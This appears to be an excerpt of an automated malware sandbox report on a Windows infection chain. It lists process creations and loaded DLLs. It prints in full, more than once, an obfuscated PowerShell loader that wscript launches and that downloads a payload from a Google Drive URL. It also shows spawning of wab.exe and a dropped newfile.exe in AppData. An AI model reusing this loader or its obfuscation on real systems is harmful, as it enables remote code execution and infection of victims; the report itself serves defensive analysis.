SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
            Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. 
Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. 
Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptnet.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cabinet.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winnsi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: urlmon.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: srvcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: netutils.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: schannel.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mskeyprotect.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ntasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: gpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncrypt.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncryptsslp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mscoree.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: version.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wbemcomn.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: amsi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: userenv.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasman.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rtutils.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ntmarta.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: vaultcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wintypes.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: secur32.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: cryptdlg.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: msoert2.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: msimg32.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: cryptui.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: msftedit.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: edputil.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: explorerframe.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: sxs.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: actxprxy.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: cryptdlg.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: msoert2.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: msimg32.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: cryptui.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: msftedit.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Section loaded: windows.storage.dll
